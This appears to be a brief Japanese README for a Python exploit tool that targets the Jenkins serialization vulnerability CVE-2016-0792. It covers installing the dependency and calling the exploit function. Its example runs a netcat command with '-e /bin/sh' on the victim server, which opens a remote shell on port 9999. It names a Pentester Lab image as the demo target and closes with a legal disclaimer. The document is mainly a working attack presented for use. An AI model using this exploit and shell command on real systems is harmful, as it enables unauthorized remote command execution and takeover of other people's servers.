
Jenkinsのシリアライゼーション脆弱性に対するエクスプロイト - CVE-2016-0792
https://www.exploit-db.com/exploits/42394/
Python 3.6.x
requests ライブラリはこのエクスプロイトの動作に必要です
sudo pip install requests
python3
from exploit import exploit
exploit(url, command)
ここで、urlはjenkinsサーバーへのurl、commandは実行するコマンドです
exploit('http://192.168.56.101/jenkins/', '/usr/bin/nc -l -p 9999 -e /bin/sh')
これにより、脆弱なマシン上でncが実行され、ポート9999がリッスンされます
デモンストレーション用に、Pentester Lab のISOを実行します
許可なく本ソフトウェアを使用してターゲットを攻撃することは違法です。私は、法律に違反して 本ソフトウェアを使用したことによるいかなる損害についても責任を負いません。